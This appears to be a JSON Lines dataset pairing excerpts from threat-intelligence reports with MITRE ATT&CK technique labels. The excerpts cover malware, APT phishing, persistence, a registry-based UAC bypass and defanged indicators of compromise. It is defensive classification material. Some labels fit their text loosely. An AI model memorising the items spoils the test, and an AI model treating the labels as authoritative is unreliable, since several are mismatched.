{"text1":"AIRBREAK: a JavaScript-based backdoor also reported as \u201cOrz\u201d that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services. BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration. HOMEFRY: a 64-bit Windows password dumper\/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session. MURKYTOP: a command-line reconnaissance tool","labels":"['T1018', 'T1135', 'T1046', 'T1087.001']"}
{"text1":"Use of obfuscated shellcode executed via PowerShell to download a \"reverse_tcp\" payload from Metasploit onto victim systems","labels":"['T1059.001']"}
{"text1":"At the time of writing, two VBS files have been seen pushed to the target computer by VBShower","labels":"['T1105']"}
{"text1":"Another difference in the network traffic generated from the malware is that the encoded proxy information has been added in the URL query values during the C2 communication. Table 4 shows the parameters sent to C2 server from the backdoor in the newer versions","labels":"['T1090.002']"}
{"text1":"Filename: impku.dat:schemas File size: 608854 bytes MD5 hash: b774f39d31c32da0f6a5fb5d0e6d2892 SHA1 hash: ae3ff39c2a7266132e0af016a48b97d565463d90 Notes: Alternate data stream (ADS) PNG file with the PowerDuke backdoor component hidden and encrypted within using Tiny Encryption Algorithm (TEA","labels":"['T1564.004']"}
{"text1":"After the victim clicks the Enable Content button, the macro commands are executed and invoke the Windows OS process msiexec.exe. This process is the Windows Installer, a software component and application programming interface of Microsoft Windows used for the installation, maintenance, and removal of software","labels":"['T1218.007']"}
{"text1":"This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. In october 2016 Group-IB published the report about the Cobalt group. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. Aside from that, startup is performed by loading Cobalt Strike into the main memory without saving to the file system. Bypassing network security Cobalt Strike allows users to install two types of modules: HTTP\/HTTPS\/DNS modules and SMB modules. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. To prevent this threat, the company should configure filter rules to detect the above-mentioned tools on the corporate network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed","labels":"['T1046']"}
{"text1":"Initially, cybercriminals used BlackEnergy custom plugins for launching DDoS attacks. While another crimeware group continues to use BlackEnergy to launch DDoS attacks, the BE2 APT appears to have used this tool exclusively throughout 2014 at victim sites and included custom plugins and scripts of their own. To be clear, our name for this actor has been the BE2 APT, while it has been called \u201cSandworm Team\u201d also","labels":"['T1555.003']"}
{"text1":"All of the bait documents are MHTML ones with malicious macro embedded and the .doc suffix to bypass detection. Below is an example of bait document captured by 360 Threat Intelligence Center in February 2019","labels":"['T1059.005']"}
{"text1":"2) The additional commands and execution objects are executed in the machine that has been compromised in the isolated network","labels":"['T1204.002']"}
{"text1":"Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands. BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal. Used by APT17 and other Chinese cyber espionage operators","labels":"['T1102.001']"}
{"text1":"Sibot is a dual-purpose malware implemented in VBScript. It is designed to achieve persistence on the infected machine then download and execute a payload from a remote C2 server. The VBScript is then run via a scheduled task","labels":"['T1053.005']"}
{"text1":"The initial infection vector of this campaign is a Microsoft Office Excel Worksheet with an Office macro that uses the mshta.exe Windows executable to run scripts, which are embedded in the HTML of a specially-crafted blogspot.com page. The page, 29[.]html, contains two distinct sections of scripts. The scripts create scheduled tasks and also retrieve, decode, and execute a copy of Revenge RAT","labels":"['T1218.005']"}
{"text1":"BRONZE UNION has also leveraged various web shells to collect and stage data for exfiltration. In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive","labels":"['T1560.002', 'T1074.001', 'T1049']"}
{"text1":"The loaded DLL retrieves the path to the Warzone malicious file from HKCU\\SOFTWARE\\_rptls\\Install, iterates through running processes and kills the Warzone process if it already exists. Then it runs the Warzone executable again, this time with Admin privileges","labels":"['T1055']"}
{"text1":"KillDisk has a numeric parameter that denotes the number of minutes (15 being the default) it will wait before it shuts down the affected machine. To try to reboot the machine, it will try to terminate these processes","labels":"['T1489']"}
{"text1":"The backdoor determines its C2 server using a Domain Generation Algorithm (DGA) to construct and resolve a subdomain of avsvmcloud[.]com. The Update method is responsible for initializing cryptographic helpers for the generation of these random C2 subdomains. Subdomains are generated by concatenating a victim userId with a reversible encoding of the victims local machine domain name. The attacker likely utilizes the DGA subdomain to vary the DNS response to victims as a means to control the targeting of the malware. These subdomains are concatenated with one of the following to create the hostname to resolve","labels":"['T1568']"}
{"text1":"Appendix A \u2013 PLAINTEE older variant Older variants of PLAINTEE can be identified via the unique mutex created during runtime. At least three variants of PLAINTEE have been identified to date, however, the following two samples have additional unique differences","labels":"['T1548.002']"}
{"text1":"The fourth spear phishing email of the campaign was sent on January 23, 2018 to a range of targets working for Tibetan NGOs, media groups, and the CTA. The message appeared to be sent from the Director of the Tibet Museum, which is an official museum of the CTA. Attached to the email were RTF and PPSX messages that claimed to present information about the National Museum of Tibet (see Figure 5). These files contained the CVE-2017-11882 and TSSL Suite infection chain","labels":"['T1566.001']"}
{"text1":"The threat actors used Windows\u2019 scheduled task and batch scripts to execute \u201cscr.exe\u201d and collect additional information from hosts on the network. The tool \u201cscr.exe\u201d is a screenshot utility that the threat actor used to capture the screen of systems across the network. The MD5 hash of \u201cscr.exe\u201d matched the MD5 of ScreenUtil, as reported in the Symantec Dragonfly 2.0 report","labels":"['T1059.003', 'T1113']"}
{"text1":"Finally, the script stores the encrypted payload in the Windows registry. Note that the attackers seem to use a different registry location per organization. Thus, it is not a useful indicator to detect similar intrusions","labels":"['T1112']"}
{"text1":"HyperStack uses named pipes to execute remote procedure calls (RPC) from the controller to the device hosting the HyperStack client. To move laterally, the implant tries to connect to another remote device\u2019s IPC$ share, either using a null session or default credentials. IPC$ is a share that facilitates inter-process communication (IPC) by exposing named pipes to write to or read from. If the implant\u2019s connection to the IPC$ is successful, the implant can forward RPC commands from the controller to the remote device, and likely has the capability to copy itself onto the remote device","labels":"['T1559', 'T1078.001']"}
{"text1":"At the time of discovery TEARDROP was a novel concoction: never-before-seen, possibly even tailor-made for this attack. TEARDROP runs in-memory but it does register a Windows service, which involves editing the registry","labels":"['T1112']"}
{"text1":"Hooking module \u2013 hooks a hardcoded set of WinAPI and (if they exist) Mozilla DLL Hooking is used to perform web injects, sniff traffic and keyboard data and even prevent DNS resolution of certain domains. Hooking works in the following way: QakBot injects a hooking module into the appropriate process, the module finds functions from the hardcoded set and modifies the functions so they jump to custom code","labels":"['T1055']"}
{"text1":"Curiously, the same private session key is also encrypted with another public key hardcoded into the body of the Trojan, regardless of the configuration. It turns out that someone who knows the private key corresponding to the public skeleton key is able to decrypt the victim\u2019s files, even without the private key for sub_key. It seems like the Trojan developers built a loophole into the algorithm allowing them to decrypt files behind the distributors\u2019 back","labels":"['T1486']"}
{"text1":"The APT group has used web hosting credentials\u2014stolen from victims outside of their usual targets\u2014to host their malicious scripts and tools. Kimsuky likely obtained the credentials from the victims via spearphishing and credential harvesting scripts. On the victim domains, they have created subdomains mimicking legitimate sites and services they are spoofing, such as Google or Yahoo mail. 14] - Kimsuky has also sent benign emails to targets, which were possibly intended to build trust in advance of a follow-on email with a malicious attachment or link. Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. The APT group invited the targets to a Skype interview on the topic of inter-Korean issues and denuclearization negotiations on the Korean Peninsula. Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. After a recipient agreed to an interview, Kimsuky sent a subsequent email with a malicious document, either as an attachment or as a Google Drive link within the body. The document usually contained a variant of BabyShark malware (see the Execution section for information on BabyShark). When the date of the interview drew near, Kimsuky sent an email canceling the interview. Kimsuky tailors its spearphishing and social engineering approaches to use topics relevant to the target, such as COVID-19, the North Korean nuclear program, or media interviews","labels":"['T1583.001']"}
{"text1":"In the newer attack flows we observed, we once again found valid Certum certificates were used to sign the Bandook malware executable","labels":"['T1553.002']"}
{"text1":"The latter does not use libcurl anymore and now uses winhttp to perform all requests to C2. The usage of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key has a persistence mechanism that has been replaced by the creation of a service. The C2 path pattern has also changed, we have identified the following paths: ini.php, info.php and parse_ini_file.php, which are no longer random nor animal named based","labels":"['T1547.001']"}
{"text1":"For the first time, the Bisonal developers decided to use a packer: MPRESS. The Bisonal string also disappears from the binary however the workflow of the malware stays the same and some features are copy\/pasted from the previous Bisonal variant","labels":"['T1027.002']"}
{"text1":"Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. Note: transfer of credentials can occur even if the file is not retrieved. After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication","labels":"['T1078']"}
{"text1":"The emails first originated from a spoofed sender that impersonated a Meetings Services Assistant at the United Nations General Assembly Secretariat. The threat actor achieved this impersonation by utilizing the legitimate email marketing service SMTP2Go, which allows users to alter the envelope sender field while using a unique sender address generated by the service","labels":"['T1585.002']"}
{"text1":"The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks","labels":"['T1566.001']"}
{"text1":"FANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities to do remote command execution, file transmission and keylogging","labels":"['T1105']"}
{"text1":"The next program sent to victims enumerates all the drives on the infected system and executes the following command on them","labels":"['T1083']"}
{"text1":"Once explorer.exe is running, the service configures the environment and executes the C2 contact module: winprint32.exe. This module is responsible for launching the document search module, contact the C2 and exfiltrate the collected documents","labels":"['T1020', 'T1041']"}
{"text1":"To initially gain access to the environment, Managed Defense analysts identified that FIN6 compromised an internet facing system. Following the compromise of this system, analysts identified FIN6 leveraged stolen credentials to move laterally within the environment using the Windows\u2019 Remote Desktop Protocol (RDP","labels":"['T1003.001', 'T1021.001', 'T1078']"}
{"text1":"Use of Open Source Tools In an attempt to avoid detection and as an anti-analysis tactic, the OilRig group abused an open source tool called Invoke-Obfuscation to obfuscate the code used for QUADAGENT. Invoke-Obfuscation is freely available via a Github repository and allows a user to change the visual representation of a PowerShell script simply by selecting the desired obfuscation techniques. Invoke-Obfuscation offers a variety of obfuscation techniques, and by analyzing the script we were able to ascertain the specific options in this attack. After identifying the specific options used to obfuscate QUADAGENT, we were able to deobfuscate the PowerShell script and perform additional analysis. We found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second one changing the representation of strings in the script. Invoke-Obfuscation calls the string obfuscation used by the actors to further obfuscate this script Reorder, which uses the string formatting functionality within PowerShell to reconstruct strings from out of order substrings (ex. 1}{0}\" -f 'bar','foo'). During our analysis, we installed Invoke-Obfuscation and used it to obfuscate a previously collected QUADAGENT sample to confirm our analysis. We captured the commands we ran in Invoke-Obfuscation in the animation in Figure 3 below, which visualizes the steps the threat actor may have taken to create the payload delivered in this attack","labels":"['T1059.003']"}
{"text1":"The purpose of this tool is to parse the hard drive for files with a specific extension and create an archive with these files. Afterward, the module will delete old \"sft\" files assuming they were already exfiltrated. After a pause of 6,500 milliseconds, it will start its search for the targeted files. SFT file creation routine Using the working directory as a base path, which in this sample case is C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp\\4CA-B25C11-A27BC\\, each selected file will be compressed into the file kr.zp","labels":"['T1083']"}
{"text1":"Cookie Notice . This website uses cookies to help personalize and improve your experience. By Continuing to use this site, you are consenting to the use of cookies. Further research into the IP address hosting the spoofed page revealed a broader campaign to steal credentials. Countries with targeted universities. Source: Secureworks) . After entering their credentials into the fake login page, victims were redirected to the legitimate website where they were automatically logged into a valid session or were prompted to enter their credentials again. Numerous spoofed domains referenced the targeted universities' online library systems, indicating the threat actors' intent to gain access to these resources. CTU\u2122 researchers were unable to confirm functionality of all identified spoofed pages because some of the domains were not accessible at the time of analysis. Domain registrations indicate the infrastructure to support this campaign was still being created when CTU researchers discovered the activity. A domain registered in May 2018 also contained subdomains spoofing university targets. These subdomains redirected visitors to spoofed login pages on other attacker-controlled domains","labels":"['T1583.001']"}
{"text1":"T1566.001: Spearphishing Attachment - T1566.002: Spearphishing Link - T1566.003: Spearphishing via Service - - - T1204.001: Malicious Link - T1204.002: Malicious File - T1059: Command and Scripting Interpreter T1059.005: Visual Basic - T1059.005: Visual Basic - - T1053.005: Scheduled Task - T1129: Shared Modules - T1106: Native API - T1047: Windows Management Instrumentation - - T1027: Obfuscated Files or Information T1027.002: Software Packing - T1027.002: Software Packing - T1553: Subvert Trust Controls T1553.002: Code Signing - T1553.002: Code Signing - T1218: Signed Binary Proxy Execution T1218.010: Regsvr32 - T1218.010: Regsvr32 - - T1497.001: System Checks - T1497.002: User Activity Based Checks - T1497.003: Time Based Evasion - T1112: Modify Registry - T1070: Indicator Removal on Host T1070.004: File Deletion - T1070.004: File Deletion - T1140: De-obfuscate\/Decode Files or Information - - - T1090.003: Multi-hop Proxy - T1105: Ingress Tool Transfer - - T1055: Process Injection T1055.012: Process Hollowing - T1055.012: Process Hollowing - - T1082: System Information Discovery - T1049: System Network Connections Discovery - T1016: System Network Configuration Discovery - T1057: Process Discovery - T1033: System Owner\/User Discovery - T1518: Software Discovery T1518.001: Security Software Discovery - T1518.001: Security Software Discovery - Persistence T1546: Event Triggered Execution T1547: Boot or Logon Autostart Execution T1547.001: Registry Run Keys \/ Startup Folder - T1546: Event Triggered Execution - T1547: Boot or Logon Autostart Execution T1547.001: Registry Run Keys \/ Startup Folder - T1547.001: Registry Run Keys \/ Startup Folder","labels":"['T1070.004']"}
{"text1":"After the execution of rundll32.exe, the PowerShell script enu.ps1 is executed. This script is encoded with Base64 in order to avoid detection by antivirus products","labels":"['T1027']"}
{"text1":"Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This configuration file contains the same actor pool and wallet information as the first. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. TermsHost.exe\" is a PE32 Monero miner. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"Windows processes to bypass firewalls. The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample also creates the UPX-packed file \"dDNLQrsBUE.url\" in the Windows Start Menu Folder","labels":"['T1547.001']"}
{"text1":"Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. TermsHost.exe\" is a PE32 Monero miner. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"Windows processes to bypass firewalls. The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample also creates the UPX-packed file \"dDNLQrsBUE.url\" in the Windows Start Menu Folder. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system","labels":"['T1027.002']"}
{"text1":"The ROKRAT author implements several techniques typically seen to frustrate human analysts and avoid sandbox execution. First, the malware does not run on Windows XP systems. The code used to perform this task: The malware checks the process names in use on the victim machine. It compares if the executed process name matches a partial name hardcoded in the sample. Here is the complete list","labels":"['T1057']"}
{"text1":"In this version, a shortcut is created in order to launch winnit.exe in the following path %USERPROFILE%\\Start Menu\\Programs\\Startup\\Anti virus service.lnk. As in the previous version, the ID of the infected system is generated with exactly the same method. The C2 is different and the analysed version this time only contains a single domain","labels":"['T1547.001']"}
{"text1":"If yes, it generates an RSA PKCS key using CryptGenKey that is used for encryption of communication session keys. It then writes the RSA key to the PRVK key in the [Version] section of the config file. Turla\u2019s Carbon backdoor also implements RSA encryption on the session keys for some of its C&C channels","labels":"['T1573.002']"}
{"text1":"root\/.ssh\/{id_rsa, id_rsa.pub}\u00a0\u2013 the SSH pair key used to update the miner from the C&C server using SCP. opt\/{bootsync.sh, bootlocal.sh}\u00a0\u2013 the system startup commands that try to update the miner from the C&C server and run it (see Scripts 7 and 8","labels":"['T1105']"}
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. Datper uses an RC4-encrypted configuration to obfuscate HTTP traffic. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity","labels":"['T1071.001']"}
{"text1":"Hardcore Nationalist group SideWinder is a threat group active since 2012 according to Kaspersky. This group mainly targets Pakistanis and Chinese military & government entities\u2019 windows machines. They also target mobile phone devices. This is the second time this group is using COVID-19 theme to lure victims, thereby capitalizing on the fear of global pandemic. Sidewinder aka HN2 is believed to be an Indian state sponsored group. A detailed analysis of SideWinder attacks on Pakistani military officials was also published in April","labels":"['T1204.002', 'T1204.001']"}
{"text1":"The SolarWinds Orion API is vulnerable to authentication bypass that could allow a remote attacker to execute API commands","labels":"['T1203']"}
{"text1":"Grandoreiro\u2019s DGA uses two strings (prefix and suffix) hardcoded in the binary and the local date as inputs. Note that based on the DGA, a different website is required for each day. We have observed some variants also using a custom base64 alphabet","labels":"['T1568.002']"}
{"text1":"WastedLocker will attempt to encrypt files on local as well as remote (network adjacent and accessible) and removable drives","labels":"['T1135']"}
{"text1":"The infection chain starts with an email in which the victim receives a download link that fetches the first-stage downloader. As we found in our analysis, this first-stage downloader is responsible for fetching a malicious MSI file hosted on an\u00a0attacker-controlled GitHub page. This MSI file is downloaded and executed on the endpoint. As a result, a malicious Python-compiled binary is dropped on the file system, which uses the Dropbox API for command-and-control (C&C) communication","labels":"['T1566.002', 'T1105', 'T1102.002', 'T1204.001']"}
{"text1":"At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. At the same time, the attackers tried to brute-force or sniff login data for such machines. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels","labels":"['T1040']"}
{"text1":"As a result of all of the above actions, when attempting to surf the web, the user\u2019s web browser will first ask the attacker web page on TOR for proxy settings. The user traffic is then redirected through a proxy controlled by the attacker, who carries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to read the victim\u2019s traffic and tamper with it in any way they please","labels":"['T1557']"}
{"text1":"After execution, Ragnar Locker Ransomware encrypts the files and adds the extension \u201c.ragnar\u201d and an 8 digit number","labels":"['T1486']"}
{"text1":"When referring to additional plugins, it is worth noting that in early versions of Valak the plugins were downloaded by the second stage JS via PowerShell. More recent versions of Valak abandoned the popular yet easily detectable PowerShell downloader approach and transitioned to PluginHost as a means of managing and downloading additional payloads. This transition indicates that the Valak authors are looking for stealthier approaches and ways to improve their evasion techniques","labels":"['T1059.001']"}
{"text1":"Controlled by Micropsia operators, the malware is able to register to an event of USB volume insertion to detect new connected USB flash drives. Once an event is triggered, Micropsia executes an RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt","labels":"['T1560.001', 'T1119']"}
{"text1":"We were able to source a sample that may be the malware involved in the May 2018 attacks. We ran it, and it broke the boot sector as expected (see Figure\u00a01). An initial analysis of the file revealed it was created using Nullsoft Scriptable Install System (NSIS), an open-source application used to create setup programs. The actor behind this threat used the application and purposely named it \u201cMBR Killer. There are no indications of network-related behavior in this malware","labels":"['T1027']"}
{"text1":"In some attacks, Whitefly has used a second piece of custom malware, Trojan.Nibatad. Like Vcrodat, Nibatad is also a loader that leverages search order hijacking, and downloads an encrypted payload to the infected computer. And similar to Vcrodat, the Nibatad payload is designed to facilitate information theft from an infected computer","labels":"['T1027']"}
{"text1":"Creates a new registry key HKCU\\Software\\Classes\\Folder\\shell\\open\\command - Sets the \u201cDefault\u201d value to \u201cpath of the malware\u201d - Creates a value \u201cDelegateExecute\u201d and sets the value to \u201c0\u201d - Executes %systemDirectory%sdclt.exe to bypass the UAC as shown below (figure 7","labels":"['T1112']"}
{"text1":"These two files, keyword_parm.txt and parm.txt contain instructions for MESSAGETAP to target and save contents of SMS messages","labels":"['T1560.003']"}
{"text1":"1) Send initial proxy module request. The initial request contains the bot ID, external IP address of the infected machine, reverse DNS lookup of the external IP address, internet speed (measured earlier) and seconds since the proxy module started. 2) Establish a connection (proxy commands sequence 1->10->11) with the PROXY-C2. 3) Initialize sessions, perform socks5 authorization with login\/password (received from PROXY-C2 with command 10). 4) Begin SOCKS5-like communication wrapped into the QakBot proxy module protocol","labels":"['T1090.002']"}
{"text1":"A technical relevant fact about this campaign is the use of Python embedded into Windows executables of the malware. There is no multi-platform support as the code is heavily Windows-oriented (use of libraries). However, we discovered several clues that the attackers prepared the infrastructure for Mac OS X and Unix victims as well. In addition to Windows components, we also found a mobile (Android) component","labels":"['T1053.005', 'T1059.006']"}
{"text1":"The second version does not carry the payload directly but instead downloads it from a C2 into the same location as before. The C2 server address is embedded in the main executable in the TinkaOTP bundle. The hardcoded download and execution code are easily visible as they are unencrypted, plain UTF strings in the binary","labels":"['T1105']"}
{"text1":"Guloader is a downloader that has been active since 2019. It is known to deliver various malware, more notably: Agent-Tesla, Netwire, FormBook, Nanocore, and Parallax RAT","labels":"['T1102']"}
{"text1":"All of the backdoors identified \u2013 excluding RoyalDNS \u2013 required APT15 to create batch scripts in order to install its persistence mechanism. This was achieved through the use of a simple Windows run key","labels":"['T1059.003']"}
{"text1":"Once communication with the C2 server has been established, QakBot is known to download and use additional modules in order to perform its malicious operations","labels":"['T1095', 'T1105']"}
{"text1":"This DLL has no other noticeable characteristics, as it functions like a typical malicious sideload. After loading the encrypted payload in memory, it transfers the execution to a shellcode that is located at the beginning of the file. Once loaded in memory, the ZeroT shellcode does not present any kind of obfuscation, unlike that for PlugX. As in the new PlugX dropper detailed below, this is done using RC4 and RtlDecompressBuffer. As in PlugX samples, the PE header of ZeroT has been tampered with, specifically the \u201cMZ\u201d and \u201cPE\u201d constants (Fig","labels":"['T1574.002']"}
{"text1":"One legitimate executable, sometimes signed, and vulnerable to dynamic-link library (DLL) sideloading - One malicious DLL loaded by the legitimate file - One binary file usually containing obfuscated code, unpacked in memory by the malicious DLL","labels":"['T1574.002', 'T1574.002', 'T1574.002']"}
{"text1":"The `Download3rdStage` will first decode `https:\/\/discord.com` and try to connect to it. Then, it performs a time-based anti-debug check, as shown in the code below. If any of these checks fail, the DLL will not download the third stage","labels":"['T1497.003']"}
{"text1":"Learn more about our Personal Data Protection PolicyAccept Cookies . DeepMalwareAnalysis . Joe Security's Blog . TrickBot's new API-Hammering explained . Published on: 13.07.2020 As usual, at Joe Security, we keep a close eye on evasive malware. It turned out to be a new TrickBot sample using API hammering to bypass analysis. Two Stage API Hammering . Right after the entry point, the sample tries to load taskmgr.exe as a DLL: This is likely a trick to bypass emulators that do not check if a given DLL exists if LoadLibraryEx is called. Since before the loop\u00a0FreeConsole has been called all printf calls do basically nothing: This code has been directly copied from the documentation of printf: So what is the purpose of those numerous\u00a0printf loops. As a result, the massive amount of calls delay the execution process and overload the sandbox with junk data. This behavior is called API Hammering. API Hammering is not a new technique, we have already seen it several years ago e.g. Joe Sandbox detects the API hammering successfully and rates it as malicious: Right after the printf flood, the sample performs another loop to delay execution by creating and writing to a temporary file - the second stage. In between it performs random sleeps: Again, the purpose is to overload the sandbox and delay the execution. No matter what technology your favorite sandbox uses, it has to handle API Hammering correctly","labels":"['T1106']"}
{"text1":"When generating the URLs within the HTTP POST and GET requests, XAgent sets one HTTP parameter using a specific data structure that contains this agent_id value. This parameter transmits the agent_id to the C2 server to obtain commands the actor wishes to execute on the compromised system. The data structure used to transmit the agent_id to the C2 is as follows","labels":"['T1106']"}
{"text1":"Inception\u2019s malware is modular and the attackers will load plugins based on requirements for each attack. The group has used a range of plugins in recent attacks, some of which are improved versions of plugins used in 2014, while others were previously unseen","labels":"['T1057']"}
{"text1":"When running under a limited UAC account, the installer extracts d3d9.dll and creates a persistence key under HKCU\\Software\\Microsoft\\Windows\\Run","labels":"['T1547.001']"}
{"text1":"The process begins with the consistent execution of a malicious DLL using the legitimate regsvr32.exe Windows Utility. Once executed, the DLL is deleted from the system and its components are dropped to the system","labels":"['T1218.010']"}
{"text1":"Following the initial compromise, in many instances the BackdoorDiplomacy group employed open-source reconnaissance and red-team tools to evaluate the environment for additional targets of opportunity and lateral movement. Among the tools documented are","labels":"['T1105', 'T1588.002']"}
{"text1":"Once the library is called by one of the triggering events implemented in its code, it reads a configuration file from a shared Google Document. If it is not able to connect to the address, it uses a hardcoded one","labels":"['T1565.002']"}
{"text1":"Hildegard uses LD_PRELOAD to hide the malicious process launched inside the containers. The malware modified the \/etc\/ld.so.preload file to intercept shared libraries\u2019 imported functions","labels":"['T1574.006']"}
{"text1":"The threat actor connected via Remote Desktop from a Domain Controller to a vCenter server and opened a PowerShell console, then used the PowerShell command -ep bypass to circumvent the execution policy. Using the Windows Azure Active Directory PowerShell Module, the threat actor connected to the victim\u2019s O365 tenant and began performing enumeration queries","labels":"['T1087.002', 'T1482']"}
{"text1":"Targets are sent spear phishing e-mails that lead them to a web site displaying a lure document and are immediately prompted to install a malicious Google Chrome extension. It then redirects the user to install a \u201cFont Manager\u201d extension from the Chrome Web Store, as seen in Figure 2. Figure 2: HTML Source of Phishing Page The malicious extensions, now removed from the Chrome Web Store, contain reviews left by the threat actor using compromised Google+ accounts. It should be noted however, that some users reported deleting the extension immediately because it prevented the Chrome browser from functioning properly. The malicious Chrome extensions declare permissions to run on every URL in the browser, as seen in Figure 3. Loading jQuery.js from an external site makes no sense, since the latest version of extension has a legitimate jQuery.js included in the extension bundle. Figure 4:\u00a0Given the threat actor\u2019s propensity for password theft, and the fact that the malicious Chrome extensions were situated to read data from every website, it's likely that the intent is to steal browser cookies and passwords. Figure 5: Certificate used to sign MECHANICAL\/GREASE While the threat actors did use a few tools to automate intrusions, we also found a ZIP archive of tools that demonstrate their propensity for password theft to propagate. Advise users to be wary of any prompts to install browser extensions, even if they are hosted on an official extension site. They spent significant time and resources doing reconnaissance on their targets, as evidenced by the comments left on the Chrome extension page","labels":"['T1176']"}
{"text1":"After the payload execution it reaches out to the C2 via POST request as shown below","labels":"['T1071.001']"}
{"text1":"All RDAT samples have malicious verdicts in WildFire and have protections in place through Cortex XDR. DNS tunneling protocols used for C2 communications are blocked via DNS Security. All C2 domains are classified as Command-and-Control for URL Filtering. AutoFocus customers can monitor activity via the rdat_backdoor tag","labels":"['T1132.002', 'T1132.001']"}
{"text1":"Endpoint Protection . The Trojan.Hydraq Incident . It has been about a week since news of the mysterious Hydraq Trojan (also known as Aurora) attack broke with the unveiling of a threat by Google to pull its operations out of China. In addition the blog also mentioned that a host of other large corporations were also targets of this same attack. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862\/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. Considering the efforts that the attackers put into staging the attack as a whole, the end malware is not so sophisticated. Download a remote file, save it as %Temp%\\mdm.exe, and then execute it. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim\u2019s machine by taking advantage of the vulnerability. Prevention & Mitigation Trojan.Hydraq has been known to be spread through specially crafted PDF files and also through malicious Web sites. The attacker can exploit this issue by supplying a malicious Flash ('.swf') file or by embedding a malicious Flash application in a PDF file","labels":"['T1105']"}
{"text1":"We mentioned earlier that docx files (like xlsx and pptx) are part of the OOXML standard. The document defining this standard[6], describes the syntax and values that can be used as an example. An interesting file to look at is the \u2018settings.xml\u2019 file that can be discovered in the \u2018Word\u2019 container of the docx zip file. This file contains settings with regards to language, markup and more. First, we extracted all the data from the settings.xml files and started to compare. All the documents below contained the same language values","labels":"['T1221']"}
